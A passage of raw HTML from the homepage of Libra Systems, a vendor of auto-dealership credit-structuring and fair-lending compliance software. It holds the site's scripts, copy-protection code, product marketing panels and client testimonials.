Chooser","mejs.stop":"Stop","mejs.speed-rate":"Speed Rate","mejs.live-broadcast":"Live Broadcast","mejs.afrikaans":"Afrikaans","mejs.albanian":"Albanian","mejs.arabic":"Arabic","mejs.belarusian":"Belarusian","mejs.bulgarian":"Bulgarian","mejs.catalan":"Catalan","mejs.chinese":"Chinese","mejs.chinese-simplified":"Chinese (Simplified)","mejs.chinese-traditional":"Chinese (Traditional)","mejs.croatian":"Croatian","mejs.czech":"Czech","mejs.danish":"Danish","mejs.dutch":"Dutch","mejs.english":"English","mejs.estonian":"Estonian","mejs.filipino":"Filipino","mejs.finnish":"Finnish","mejs.french":"French","mejs.galician":"Galician","mejs.german":"German","mejs.greek":"Greek","mejs.haitian-creole":"Haitian Creole","mejs.hebrew":"Hebrew","mejs.hindi":"Hindi","mejs.hungarian":"Hungarian","mejs.icelandic":"Icelandic","mejs.indonesian":"Indonesian","mejs.irish":"Irish","mejs.italian":"Italian","mejs.japanese":"Japanese","mejs.korean":"Korean","mejs.latvian":"Latvian","mejs.lithuanian":"Lithuanian","mejs.macedonian":"Macedonian","mejs.malay":"Malay","mejs.maltese":"Maltese","mejs.norwegian":"Norwegian","mejs.persian":"Persian","mejs.polish":"Polish","mejs.portuguese":"Portuguese","mejs.romanian":"Romanian","mejs.russian":"Russian","mejs.serbian":"Serbian","mejs.slovak":"Slovak","mejs.slovenian":"Slovenian","mejs.spanish":"Spanish","mejs.swahili":"Swahili","mejs.swedish":"Swedish","mejs.tagalog":"Tagalog","mejs.thai":"Thai","mejs.turkish":"Turkish","mejs.ukrainian":"Ukrainian","mejs.vietnamese":"Vietnamese","mejs.welsh":"Welsh","mejs.yiddish":"Yiddish"}}; </script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/mediaelement/mediaelement-and-player.min.js?ver=4.2.6-78496d1'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/mediaelement/mediaelement-migrate.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var _wpmejsSettings = {"pluginPath":"\/wp-includes\/js\/mediaelement\/","classPrefix":"mejs-","stretching":"responsive"}; /* ]]> */ </script> <meta name="generator" content="WordPress 5.2" /> <link rel="canonical" href="https://librasys.com/" /> <link rel='shortlink' href='https://librasys.com/' /> <link rel="alternate" type="application/json+oembed" href="https://librasys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flibrasys.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://librasys.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flibrasys.com%2F&#038;format=xml" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-82715305-1', 'auto'); ga('send', 'pageview'); </script> <script id="wpcp_disable_selection" type="text/javascript"> //<![CDATA[ var image_save_msg='You Can Not Save images!'; var no_menu_msg='Context Menu disabled!'; var smessage = "Content is protected."; function disableEnterKey(e) { if (e.ctrlKey){ var key; if(window.event) key = window.event.keyCode; //IE else key = e.which; //firefox (97) //if (key != 17) alert(key); if (key == 97 || key == 65 || key == 67 || key == 99 || key == 88 || key == 120 || key == 26 || key == 85 || key == 86 || key == 83 || key == 43) { show_wpcp_message('You are not allowed to copy content or view source'); return false; }else return true; } } function disable_copy(e) { var elemtype = e.target.nodeName; var isSafari = /Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor); elemtype = elemtype.toUpperCase(); var checker_IMG = ''; if (elemtype == "IMG" && checker_IMG == 'checked' && e.detail >= 2) {show_wpcp_message(alertMsg_IMG);return false;} if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED") { if (smessage !== "" && e.detail == 2) show_wpcp_message(smessage); if (isSafari) return true; else return false; } } function disable_copy_ie() { var elemtype = window.event.srcElement.nodeName; elemtype = elemtype.toUpperCase(); if (elemtype == "IMG") {show_wpcp_message(alertMsg_IMG);return false;} if (elemtype != "TEXT" && elemtype != "TEXTAREA" && elemtype != "INPUT" && elemtype != "PASSWORD" && elemtype != "SELECT" && elemtype != "OPTION" && elemtype != "EMBED") { //alert(navigator.userAgent.indexOf('MSIE')); //if (smessage !== "") show_wpcp_message(smessage); return false; } } function reEnable() { return true; } document.onkeydown = disableEnterKey; document.onselectstart = disable_copy_ie; if(navigator.userAgent.indexOf('MSIE')==-1) { document.onmousedown = disable_copy; document.onclick = reEnable; } function disableSelection(target) { //For IE This code will work if (typeof target.onselectstart!="undefined") target.onselectstart = disable_copy_ie; //For Firefox This code will work else if (typeof target.style.MozUserSelect!="undefined") {target.style.MozUserSelect="none";} //All other (ie: Opera) This code will work else target.onmousedown=function(){return false} target.style.cursor = "default"; } //Calling the JS function directly just after body load window.onload = function(){disableSelection(document.body);}; //]]> </script> <script id="wpcp_disable_Right_Click" type="text/javascript"> //<![CDATA[ document.ondragstart = function() { return false;} /* ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Disable context menu on images by GreenLava Version 1.0 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ */ function nocontext(e) { return false; } document.oncontextmenu = nocontext; //]]> </script> <style> .unselectable { -moz-user-select:none; -webkit-user-select:none; cursor: default; } html { -webkit-touch-callout: none; -webkit-user-select: none; -khtml-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; -webkit-tap-highlight-color: rgba(0,0,0,0); } </style> <script id="wpcp_css_disable_selection" type="text/javascript"> var e = document.getElementsByTagName('body')[0]; if(e) { e.setAttribute('unselectable',on); } </script> <script> var theme_options = { ajax_url: "https://librasys.com/wp-admin/admin-ajax.php" }; </script> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://librasys.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE 8]><link rel="stylesheet" type="text/css" href="https://librasys.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]--><meta name="generator" content="Powered by Slider Revolution 5.1.3 - responsive, Mobile-Friendly Slider Plugin for WordPress with comfortable drag and drop interface." /> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1457639178584{margin-right: 20px !important;margin-left: 20px !important;background-color: #ffffff !important;}.vc_custom_1453506601395{padding-right: 75px !important;padding-left: 75px !important;}.vc_custom_1456858614546{background-color: #ffffff !important;}.vc_custom_1457639308517{background-color: #ffffff !important;}.vc_custom_1457551205330{margin-top: 0px !important;margin-right: 20px !important;margin-bottom: 0px !important;margin-left: 20px !important;border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;background-color: #ffffff !important;border-left-color: #eeeeee !important;border-left-style: solid !important;border-right-color: #eeeeee !important;border-right-style: solid !important;border-top-color: #eeeeee !important;border-top-style: solid !important;border-bottom-color: #eeeeee !important;border-bottom-style: solid !important;border-radius: 5px !important;}.vc_custom_1457551196886{margin-top: 0px !important;margin-right: 20px !important;margin-bottom: 0px !important;margin-left: 20px !important;border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;border-left-color: #eeeeee !important;border-left-style: solid !important;border-right-color: #eeeeee !important;border-right-style: solid !important;border-top-color: #eeeeee !important;border-top-style: solid !important;border-bottom-color: #eeeeee !important;border-bottom-style: solid !important;border-radius: 5px !important;}.vc_custom_1457551212916{margin-top: 0px !important;margin-right: 20px !important;margin-bottom: 0px !important;margin-left: 20px !important;border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;border-left-color: #eeeeee !important;border-left-style: solid !important;border-right-color: #eeeeee !important;border-right-style: solid !important;border-top-color: #eeeeee !important;border-top-style: solid !important;border-bottom-color: #eeeeee !important;border-bottom-style: solid !important;border-radius: 5px !important;}.vc_custom_1457551226963{margin-top: 0px !important;margin-right: 20px !important;margin-bottom: 0px !important;margin-left: 20px !important;border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;border-left-color: #eeeeee !important;border-left-style: solid !important;border-right-color: #eeeeee !important;border-right-style: solid !important;border-top-color: #eeeeee !important;border-top-style: solid !important;border-bottom-color: #eeeeee !important;border-bottom-style: solid !important;}</style><noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><style type='text/css' id='theme-customize-css'> .detail-wrr{ min-height:;} .footer-top svg path, .footer-top svg rect { fill: #050042; } </style> </head> <body class="home page-template-default page page-id-2 unselectable wpb-js-composer js-comp-ver-4.10 vc_responsive"> <div class="nav-menu-icon"> <a href="javascript:;"><i></i></a> </div> <!-- Site logo --> <div class="container"> <div class="site-logo"> <a href="https://librasys.com/"> <img src="" alt="Libra Systems"/> </a> </div> <!-- Mouse icon --> </div> <header id="header"> <div class="container"> <div class="row"> <div class="col-sm-5"> <nav class="navigation-left"> <ul id="menu-dealer-login" class="menu"><li id="menu-item-112" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112"><a href="http://app.librasys.com">Dealer Login</a></li> </ul> </nav> </div> <div class="col-sm-2 curved-shape"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="325px" height="90px" viewBox="0 0 325 90" preserveAspectRatio="xMinYMid" enable-background="new 0 0 325 90" xml:space="preserve"> <path fill="#ffffff" d="M162.635,49.333C204.638,49.333,233.143,90,266.511,90s10.385,0,10.385,0V30h-228v60c0,0-16.127,0,12.378,0 S120.632,49.333,162.635,49.333z"></path> <rect fill="#ffffff" width="50" height="90"></rect> <rect x="275.801" fill="#ffffff" width="50" height="90"></rect> <rect x="48.823" y="0.005" fill="#ffffff" width="228.541" height="30.5"></rect> </svg> </div> <div class="col-sm-5"> <nav class="navigation-right text-right"> <ul id="menu-libra-systems" class="menu"><li id="menu-item-18" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-2 current_page_item menu-item-18"><a href="https://librasys.com/" aria-current="page">Home</a></li> <li id="menu-item-226" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226"><a href="https://librasys.com/contact/">Contact</a></li> <li id="menu-item-248" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-248"><a href="https://librasys.com/resources/">Resources</a></li> </ul> </nav> </div> </div> </div> <nav class="mobile"> <ul id="menu-dealer-login-1" class="menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-112"><a href="http://app.librasys.com">Dealer Login</a></li> </ul> <ul id="menu-libra-systems-1" class="menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-2 current_page_item menu-item-18"><a href="https://librasys.com/" aria-current="page">Home</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-226"><a href="https://librasys.com/contact/">Contact</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-248"><a href="https://librasys.com/resources/">Resources</a></li> </ul> </nav> </header> <section class="content-area "> <div class="clip"> <div class="bg bg-bg-chrome act" style=""></div> </div> <div class="section-content" style=""> <div class="container"> <div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 15px" ><span class="vc_empty_space_inner"></span></div> </div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_single_image wpb_content_element vc_align_center"> <figure class="wpb_wrapper vc_figure"> <div class="vc_single_image-wrapper vc_box_border_grey"><img width="375" height="273" src="https://librasys.com/wp-content/uploads/2016/01/libra_logo_grey.jpg" class="vc_single_image-img attachment-full" alt="" srcset="https://librasys.com/wp-content/uploads/2016/01/libra_logo_grey.jpg 375w, https://librasys.com/wp-content/uploads/2016/01/libra_logo_grey-300x218.jpg 300w" sizes="(max-width: 375px) 100vw, 375px" /></div> </figure> </div> </div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_empty_space" style="height: 15px" ><span class="vc_empty_space_inner"></span></div> </div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h2 style="text-align: left;">              Greater PROFITS</h2> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner "><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <h2 style="text-align: left;">Greater PROTECTION</h2> </div> </div> </div></div></div></div><div class="vc_row wpb_row vc_row-fluid vc_custom_1457639178584 vc_row-has-fill"><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner vc_custom_1453506601395"><div class="wpb_wrapper"><div class="vc_tta-container" data-vc-action="collapseAll"><div class="vc_general vc_tta vc_tta-accordion vc_tta-color-white vc_tta-style-modern vc_tta-shape-rounded vc_tta-o-shape-group vc_tta-controls-align-left vc_tta-o-all-clickable vc_custom_1456858614546"><div class="vc_tta-panels-container"><div class="vc_tta-panels"><div class="vc_tta-panel" id="1453339142898-17af2330-4524" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453339142898-17af2330-4524" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Increase PVR and Volume</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>Desking decisions based solely off a FICO score cause daily missed opportunities.</li> <li>LIBRA “intelligently” reads a customer’s credit profile and delivers highly predictable analytics with dynamic tool that allows the dealer to structure the most profitable deal within APR and advance guidelines.</li> <li>Significant increase in PVR dollars with ability to identify and close additional deals that are often misidentified as “not our customer.”</li> </ul> </div> </div> </div></div><div class="vc_tta-panel" id="1453339786489-00f2971d-dcb8" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453339786489-00f2971d-dcb8" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Reduce CITs</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>Digital, interactive credit application process quickly and efficiently gathers complete information and all needed steps to allow for fast, easy funding.</li> </ul> </div> </div> </div></div><div class="vc_tta-panel" id="1453339143041-04c52dae-3614" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453339143041-04c52dae-3614" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Eliminate Unwinds and Recontracts</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>Putting the customer in the wrong deal structure that does not meet lender guidelines results in unwinds and recontracts.</li> <li>While FICO score is one factor, numerous other factors (LTV, DTI, PTI, credit history, etc.) come into play in determining whether a deal will get funding approved. LIBRA allows the dealer to avoid the guesswork by properly structuring the deal from the get-go.</li> </ul> </div> </div> </div></div><div class="vc_tta-panel" id="1453339686130-2a281731-68a7" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453339686130-2a281731-68a7" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Improved Customer Satisfaction</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>Car buyers today expect a simpler, quicker process. LIBRA system offers dealers an alternative to “old-school” negotiation processes. Customer experience is enhanced by a digitized credit application process and the ability to quickly present an accurate deal structure that works for both dealer and customer.</li> </ul> </div> </div> </div></div><div class="vc_tta-panel" id="1456796511906-3900ec09-dd91" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1456796511906-3900ec09-dd91" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Greater Employee Efficiency</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>Regardless of credit education training, management expertise or management churn, LIBRA provides consistency throughout the work-flow.</li> </ul> </div> </div> </div></div></div></div></div></div></div></div></div><div class="wpb_column vc_column_container vc_col-sm-6"><div class="vc_column-inner "><div class="wpb_wrapper"><div class="vc_tta-container" data-vc-action="collapseAll"><div class="vc_general vc_tta vc_tta-accordion vc_tta-color-white vc_tta-style-modern vc_tta-shape-rounded vc_tta-o-shape-group vc_tta-controls-align-left vc_tta-o-all-clickable vc_custom_1457639308517"><div class="vc_tta-panels-container"><div class="vc_tta-panels"><div class="vc_tta-panel" id="1453339883202-60b1377a-4d06" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453339883202-60b1377a-4d06" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Protect Against Claims</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>FICO score is just one of several factors that determine whether a customer will qualify for credit. But ask yourself: Does every 640 FICO score customer leave your dealership with the same contracted rate? Will your elderly 640 customer with a discharged bankruptcy and a negative equity trade-in receive the same approvals as your young 640 first-time buyer? If not, do your current processes allow you to justify these variances?</li> <li>Most recommended compliance programs rely on the dealer to uniformly implement a rate matrix based solely on FICO scores. However, a rate matrix is largely ineffective and can provide little protection against discriminatory lending claims without considering deal-specific factors such as LTV, DTI, and PTI, or adjusting for customer-specific factors such as first-time buyers, bankruptcies, or positive trade lines.</li> <li>With LIBRA, dealers replace a manager’s subject assignment of APR with a consistent, non-discriminatory process.</li> </ul> </div> </div> </div></div><div class="vc_tta-panel" id="1453339883383-ab811d51-edfd" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453339883383-ab811d51-edfd" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Historical Action Logs</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>Protection from claims of discrepancies sent to the lender.</li> <li>Details the original submission and subsequent changes.</li> </ul> </div> </div> </div></div><div class="vc_tta-panel" id="1453340044026-dc947373-4a19" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453340044026-dc947373-4a19" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Privacy and Safeguards</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>Comply with privacy and safeguard laws by going paperless with sensitive customer information.</li> <li>Permission-based logins limit access only to employees with proper authority.</li> </ul> </div> </div> </div></div><div class="vc_tta-panel" id="1453340046848-4d7b1734-45a9" data-vc-content=".vc_tta-panel-body"><div class="vc_tta-panel-heading"><h4 class="vc_tta-panel-title vc_tta-controls-icon-position-left"><a href="#1453340046848-4d7b1734-45a9" data-vc-accordion data-vc-container=".vc_tta-container"><span class="vc_tta-title-text">Compliance Dashboard</span><i class="vc_tta-controls-icon vc_tta-controls-icon-plus"></i></a></h4></div><div class="vc_tta-panel-body"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <ul> <li>From delivering Risk Based Pricing Notices (RBPN) and Adverse Action Notices to complying with Red Flags, LIBRA helps dealers manage critical steps so that you can be certain every deal is fully compliant with your policies and procedures.</li> </ul> </div> </div> </div></div></div></div></div></div></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner "><div class="wpb_wrapper"><h3 class='heading-dash text-center '>Words From Our Clients</h3></div></div></div></div><div class="vc_row wpb_row vc_row-fluid"><div class="wpb_column vc_column_container vc_col-sm-3 vc_col-has-fill"><div class="vc_column-inner vc_custom_1457551205330"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>“<strong>LIBRA </strong>has been <strong>fundamental </strong>in the <strong>growth </strong>of our department. We have expedited deal times, <strong>delivered more subprime business</strong> and <strong> maximized profit. </strong> The thorough applications collected through <strong> LIBRA </strong> have also helped <strong>accelerate our funding </strong>and run cleaner CITs. LIBRA gives me additional confidence in my staff to <strong>spot deliver more deals </strong>when I am not in the store, knowing as long as they use the system, I will have an easy fundable contract.”</p> <h5><strong>&#8212; </strong><em><strong>Jennifer Hurley,</strong><br /> </em>Finance Director, Royal KIA</h5> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3 vc_col-has-fill"><div class="vc_column-inner vc_custom_1457551196886"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>“<strong>LIBRA </strong>basically gives you a great “Finance Director” at the tower no matter what, sitting with your Desk Managers to <strong>maximize profit </strong>as well as ensure you make every opportunity by giving an <strong>accurate </strong>and <strong>quick line-out </strong>on each and every deal!”</p> <h5><strong>&#8212; <em>Robby Motz</em>,</strong><br /> General Manager, Bell Honda</h5> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3 vc_col-has-fill"><div class="vc_column-inner vc_custom_1457551212916"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>&#8220;When the NADA and AIADA released their programs designed to strengthen a dealership’s efforts to <strong>comply with fair </strong><strong>credit laws</strong>, I was an early advocate and recommended it to all my dealer clients. But after seeing LIBRA, I am now convinced that this type of system is an <strong>absolute critical component for any </strong><strong>dealer </strong>looking to protect themselves from accusations of discriminatory lending practices.”</p> <h5><strong>&#8212; </strong><em><strong>Michael Maledon,</strong><br /> </em>Industry legal expert, former general counsel of Van Tuyl Group</h5> </div> </div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-3 vc_col-has-fill"><div class="vc_column-inner vc_custom_1457551226963"><div class="wpb_wrapper"> <div class="wpb_text_column wpb_content_element "> <div class="wpb_wrapper"> <p>&#8220;My experience with LIBRA has been ultimately amazing. I not only have complete confidence in the finance calculator, but also the compliance aspect of LIBRA. We have encompassed the online credit applications in every department within our dealership, therefore protecting all of our customers’ personal and private information. I have truly enjoyed working with the staff from LIBRA, and also have the confidence our dealership is now more protected from any compliance/safeguard issues.</p> <h5><em><strong>&#8212; Joshua M. Betancourt</strong></em><br /> New Car Sales Manager, John Elway Chevrolet</h5> </div> </div> </div></div></div></div> <div class='clearfix'></div> </div> </div> </section> <div id="footer-top" class="footer-top"> <div class="container"> <div class="col-md-5"></div> <div class="col-md-2"> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="325.37px" height="90px" viewBox="347.802 0 325.37 90" enable-background="new 347.802 0 325.37 90" xml:space="preserve"> <path fill="#2c2c2c" d="M510.968,40.667C468.966,40.667,440.46,0,407.093,0c-33.369,0-10.385,0-10.385,0v60h228V0 c0,0,16.127,0-12.379,0C583.825,0,552.972,40.667,510.968,40.667z"></path> <rect x="623.604" fill="#2c2c2c" width="50" height="90"></rect> <rect x="347.802" fill="#2c2c2c" width="50" height="90"></rect> <rect x="396.239" y="59.495" fill="#2c2c2c" width="228.541" height="30.5"></rect> </svg> </div> <div class="col-md-5"></div> </div> <span class="back-to-top">Back to top</span> </div> <footer id="footer"> <div class="container" style="background-image: url( )"> <div class="row"> <div class='col-md-3 col-sm-6 footer-column-1'></div><div class='col-md-3 col-sm-6 footer-column-2'></div><div class='col-md-3 col-sm-6 footer-column-3'></div><div class='col-md-3 col-sm-6 footer-column-4'></div> </div> </div> </footer> <div class="sub-footer"> <div class="row"> <div class="col-sm-12"> <div class="entry-footer"> © COPYRIGHT 2016 Libra Systems </div> </div> </div> </div> <div id="wpcp-error-message" class="msgmsg-box-wpcp warning-wpcp hideme"><span>error: </span>Content is protected.</div> <script> var timeout_result; function show_wpcp_message(smessage) { if (smessage !== "") { var smessage_text = '<span>Alert: </span>'+smessage; document.getElementById("wpcp-error-message").innerHTML = smessage_text; document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp showme"; clearTimeout(timeout_result); timeout_result = setTimeout(hide_message, 3000); } } function hide_message() { document.getElementById("wpcp-error-message").className = "msgmsg-box-wpcp warning-wpcp hideme"; } </script> <style type="text/css"> #wpcp-error-message { direction: ltr; text-align: center; transition: opacity 900ms ease 0s; z-index: 99999999; } .hideme { opacity:0; visibility: hidden; } .showme { opacity:1; visibility: visible; } .msgmsg-box-wpcp { border-radius: 10px; color: #555; font-family: Tahoma; font-size: 11px; margin: 10px; padding: 10px 36px; position: fixed; width: 255px; top: 50%; left: 50%; margin-top: -10px; margin-left: -130px; -webkit-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); -moz-box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); box-shadow: 0px 0px 34px 2px rgba(242,191,191,1); } .msgmsg-box-wpcp span { font-weight:bold; text-transform:uppercase; } .error-wpcp { background:#ffecec url('https://librasys.com/wp-content/plugins/wp-content-copy-protector/images/error.png') no-repeat 10px 50%; border:1px solid #f5aca6; } .success { background:#e9ffd9 url('https://librasys.com/wp-content/plugins/wp-content-copy-protector/images/success.png') no-repeat 10px 50%; border:1px solid #a6ca8a; } .warning-wpcp { background:#ffecec url('https://librasys.com/wp-content/plugins/wp-content-copy-protector/images/warning.png') no-repeat 10px 50%; border:1px solid #f5aca6; } .notice { background:#e3f7fc url('https://librasys.com/wp-content/plugins/wp-content-copy-protector/images/notice.png') no-repeat 10px 50%; border:1px solid #8ed9f6; } </style> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/resizable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/button.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/jquery/ui/dialog.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/wpdialog.min.js?ver=5.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/librasys.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}}}; /* ]]> */ </script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/mediaelement/wp-mediaelement.min.js?ver=5.2'></script> <script type='text/javascript' src='https://librasys.com/wp-content/themes/creatify/vendors/bootstrap/js/bootstrap.min.js?ver=5.2'></script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/js_composer/assets/lib/waypoints/waypoints.min.js?ver=4.10'></script> <script type='text/javascript' src='https://librasys.com/wp-content/plugins/js_composer/assets/lib/bower/isotope/dist/isotope.pkgd.min.js?ver=4.10'></script> <script type='text/javascript' src='https://librasys.com/wp-content/themes/creatify/js/jquery.kwicks.min.js?ver=5.2'></script> <script type='text/javascript' src='https://librasys.com/wp-content/themes/creatify/js/jquery.counterup.js?ver=5.2'></script> <script type='text/javascript' src='https://librasys.com/wp-content/themes/creatify/vendors/owl-carousel/owl.carousel.min.js?ver=5.2'></script> <script type='text/javascript' src='https://librasys.com/wp-content/themes/creatify/js/scripts.js?ver=5.2'></script> <script type='text/javascript' src='https://librasys.com/wp-includes/js/wp-embed.min.js?ver=5.2'></script> <script type='text/javascript' 